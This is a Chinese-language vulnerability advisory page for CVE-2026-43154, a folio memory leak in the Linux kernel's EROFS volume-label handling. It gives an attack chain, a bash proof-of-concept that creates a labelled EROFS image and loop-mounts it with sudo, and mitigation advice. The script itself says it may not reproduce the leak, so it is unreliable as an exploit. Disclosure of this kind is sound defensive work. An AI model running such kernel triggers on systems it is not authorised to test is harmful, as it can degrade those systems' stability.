IPBUF安全漏洞报告
English
CVE-2026-43154 CVSS 5.5 中危

CVE-2026-43154 Linux内核EROFS卷标处理内存泄漏漏洞

披露日期: 2026-05-06
来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号
CVE-2026-43154
漏洞类型
内存泄漏
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Linux Kernel

相关标签

Linux KernelEROFSMemory LeakLocalResource Management Error

漏洞概述

Linux内核的EROFS文件系统驱动中存在一处内存管理漏洞。当系统处理包含有效卷标的特制EROFS镜像时,卷标处理逻辑中的错误会导致代码执行不正确的提前返回。这种异常退出路径未能正确释放内存页引用,从而引发Folio引用泄漏。尽管该漏洞不会直接导致系统崩溃或造成严重的安全后果,但持续的内存泄漏可能会逐渐消耗系统资源,最终影响系统的稳定性与可用性。

技术细节

该漏洞源于Linux内核EROFS(增强型只读文件系统)驱动程序在解析卷标时的逻辑错误。在特定条件下,当处理带有卷标的EROFS镜像时,代码会进入一个提前返回的路径。然而,在该路径中,代码未能遵循正确的资源清理流程,导致表示内存页的Folio结构引用计数未被递减。从技术原理上看,这属于一种资源管理错误。由于CVSS向量为AV:L/AC:L/PR:L,攻击者需要拥有本地低权限账户,并能诱导系统加载或挂载恶意的EROFS文件系统镜像。虽然CVSS评分中可用性影响为高(A:H),但内核维护者指出这通常不会导致立即的崩溃,更多表现为潜在的内存资源耗尽风险。

攻击链分析

STEP 1
步骤1
攻击者制作包含特定有效卷标的特制EROFS镜像文件。
STEP 2
步骤2
攻击者将此镜像文件上传至目标Linux系统(需具备本地低权限)。
STEP 3
步骤3
攻击者在目标系统上挂载该EROFS镜像,触发内核文件系统解析逻辑。
STEP 4
步骤4
内核在处理卷标时触发错误的提前退出路径,导致Folio内存引用泄漏。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/bin/bash # PoC for CVE-2026-43154: EROFS Volume Label Folio Leak # This script demonstrates the trigger condition: mounting a crafted EROFS image. # Note: Reproducing the specific leak requires a kernel built before the patch # and potentially specific image parameters, but the vector is the mount operation. IMAGE_FILE="crafted_erofs.img" MOUNT_DIR="/tmp/erofs_poc" SOURCE_DIR="source_erofs" # 1. Prepare a directory structure mkdir -p $SOURCE_DIR echo "Sensitive Data" > $SOURCE_DIR/file.txt # 2. Create an EROFS image with a volume label # The vulnerability is triggered during the handling of this label. # Using 'mkfs.erofs' to create a valid image structure. echo "[*] Creating EROFS image with volume label..." if command -v mkfs.erofs &> /dev/null; then mkfs.erofs -L "VulnLabel_CVE-2026-43154" $IMAGE_FILE $SOURCE_DIR else echo "[!] mkfs.erofs not found. Please install erofs-utils." exit 1 fi # 3. Prepare mount point mkdir -p $MOUNT_DIR # 4. Trigger the vulnerability # The leak occurs when the kernel processes the superblock and volume label echo "[*] Attempting to mount image to trigger early exit path..." sudo mount -t erofs -o loop $IMAGE_FILE $MOUNT_DIR 2>/dev/null if [ $? -eq 0 ]; then echo "[+] Image mounted successfully. Memory leak may have occurred." # In a real test environment, use 'slabtop' or kernel debug tools to monitor folio leaks. sleep 1 sudo umount $MOUNT_DIR else echo "[-] Mount failed. Check kernel logs (dmesg)." fi # Cleanup rm -rf $SOURCE_DIR $IMAGE_FILE $MOUNT_DIR echo "[*] Cleanup complete."

影响范围

Linux Kernel < v6.6 (Specific commits fix this)
Linux Kernel stable branches prior to commits 3afa4da, 8d8a878, d498bd1

防御指南

临时缓解措施
由于该漏洞需要本地挂载恶意镜像,最有效的临时缓解措施是禁止不受信任的用户挂载EROFS文件系统,或通过内核模块黑名单机制临时禁用EROFS模块(如果系统不依赖该文件系统)。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表